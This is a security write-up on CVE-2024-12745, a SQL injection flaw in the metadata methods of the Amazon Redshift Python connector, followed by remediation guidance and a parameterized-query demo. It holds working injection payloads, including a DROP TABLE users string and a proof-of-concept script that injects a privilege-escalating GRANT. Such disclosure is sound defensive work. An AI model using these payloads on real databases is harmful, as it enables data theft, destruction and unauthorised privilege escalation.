CVE-2024-12745 - Exploiting SQL Injection in Amazon Redshift Python Connector v2.1.4
Author: SecureFuse Labs
Introduction
In February 2024, a serious SQL injection vulnerability, CVE-2024-12745, was discovered in the Amazon Redshift Python Connector, specifically in version 2.1.4. This flaw allows attackers to escalate privileges or execute arbitrary SQL commands through the connector’s metadata APIs: get_schemas, get_tables, and get_columns. If you’re responsible for Redshift pipeline integrations or data engineering with Python, read closely—your infrastructure might be at risk.
This post breaks down how the vulnerability works, provides proof-of-concept (PoC) code, and explains how to stay safe.
What Is CVE-2024-12745?
The Redshift Python Connector helps developers and analysts interact with Amazon Redshift clusters from Python scripts and notebooks. Like all middle-layer code, it needs to safely handle user input that interacts with database queries.
The Vulnerability
CVE-2024-12745 is a classic SQL Injection: unsanitized user input gets directly interpolated into an underlying SQL query. Attackers can exploit this to read confidential data, escalate privileges, or modify the database.
Affected methods:
- get_schemas
- get_tables
- get_columns

These methods accept string arguments that get directly inserted into SQL queries without proper escaping.
Exploit Details: How Does It Work?
Let’s look at a simplified version of the vulnerable code from v2.1.4’s cursor.py:
```python
def get_schemas(self, schema_pattern):
    # Vulnerable: the caller-supplied pattern is interpolated straight into the SQL text
    query = f"SELECT schema_name FROM information_schema.schemata WHERE schema_name LIKE '{schema_pattern}'"
    self.execute(query)
    return self.fetchall()
```
If schema_pattern is set to

```
%' OR 1=1;--
```

the query becomes

```sql
SELECT schema_name FROM information_schema.schemata WHERE schema_name LIKE '%' OR 1=1;--'
```
Result: All schemas are leaked, not just those matching a safe pattern.
Suppose a user passes a more dangerous payload:

```
%' ; DROP TABLE users; --
```
Now the database might execute the injected DROP TABLE users statement, potentially erasing critical user data.
Here’s a proof-of-concept to demonstrate the injection:

```python
import redshift_connector

conn = redshift_connector.connect(
    host='<your_cluster>.redshift.amazonaws.com',
    database='dev',
    user='normal_user',
    password='yourpassword'
)
cursor = conn.cursor()

malicious_schema = "%'; GRANT ALL PRIVILEGES ON DATABASE dev TO normal_user; --"
# This will inject a privilege escalation command!
try:
    schemas = cursor.get_schemas(malicious_schema)
    print("Schemas:", schemas)
except Exception as e:
    print("Error:", e)
```
Result: After execution, normal_user may suddenly have full privileges on the database.
Remediation
Amazon recommends upgrading the driver to v2.1.5 (or later), which properly sanitizes all arguments and uses bind parameters to prevent injection.
- Release notes for 2.1.5
- Security advisory
If you can’t upgrade: Downgrade to v2.1.3, which does not contain the vulnerable code. Do _not_ use v2.1.4.
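To show why the bind-parameter fix works, here is an added example (not code from the connector or from this post) that runs the v2.1.4-style string interpolation and a parameterized query side by side against an in-memory SQLite table standing in for information_schema.schemata. The table name and contents, the `?` placeholder (SQLite's paramstyle, not redshift_connector's `%s`), and the validate_pattern helper are assumptions made for the demo.

```python
import re
import sqlite3

# Constructed stand-in for Redshift's information_schema.schemata so the demo
# runs offline against SQLite (assumption: not the real cluster or connector).
SCHEMAS = ["public", "finance", "pg_catalog"]


def _db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE schemata (schema_name TEXT)")
    conn.executemany("INSERT INTO schemata VALUES (?)", [(s,) for s in SCHEMAS])
    return conn


def get_schemas_vulnerable(conn, schema_pattern):
    # Mirrors the v2.1.4 pattern: the argument is interpolated into the SQL
    # text, so a quote character in it changes the statement's structure.
    query = f"SELECT schema_name FROM schemata WHERE schema_name LIKE '{schema_pattern}'"
    return [row[0] for row in conn.execute(query).fetchall()]


def get_schemas_safe(conn, schema_pattern):
    # Bind parameter: the value is passed separately from the SQL text, so it
    # can only be compared as a LIKE pattern, never parsed as SQL.
    query = "SELECT schema_name FROM schemata WHERE schema_name LIKE ?"
    return [row[0] for row in conn.execute(query, (schema_pattern,)).fetchall()]


_PATTERN_OK = re.compile(r"^[A-Za-z0-9_%]*$")


def validate_pattern(schema_pattern):
    # Defence in depth at the call site: a schema-name pattern never needs
    # quotes, semicolons or comment markers, so reject them before querying.
    if not _PATTERN_OK.match(schema_pattern):
        raise ValueError(f"rejected schema pattern: {schema_pattern!r}")
    return schema_pattern


def demo():
    conn = _db()
    payload = "%' OR 1=1;--"  # the payload from the write-up
    leaked = get_schemas_vulnerable(conn, payload)  # every schema comes back
    contained = get_schemas_safe(conn, payload)     # nothing matches the literal
    return leaked, contained


if __name__ == "__main__":
    leaked, contained = demo()
    print("vulnerable:   ", leaked)
    print("parameterized:", contained)
```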
Original References
- NIST National Vulnerability Database: CVE-2024-12745
- Official Amazon PR fixing the issue
- Redshift Python Driver GitHub
Conclusion
CVE-2024-12745 is a wake-up call for teams using Amazon Redshift Python Connector v2.1.4. SQL injections are one of the oldest attacks in the book, but remain prevalent—and devastating—when developers trust user input in backend code.
Take action immediately: Patch your connector, monitor your environments, and always validate user input.
Timeline
Published on: 12/24/2024 17:15:08 UTC
Last modified on: 12/26/2024 15:15:06 UTC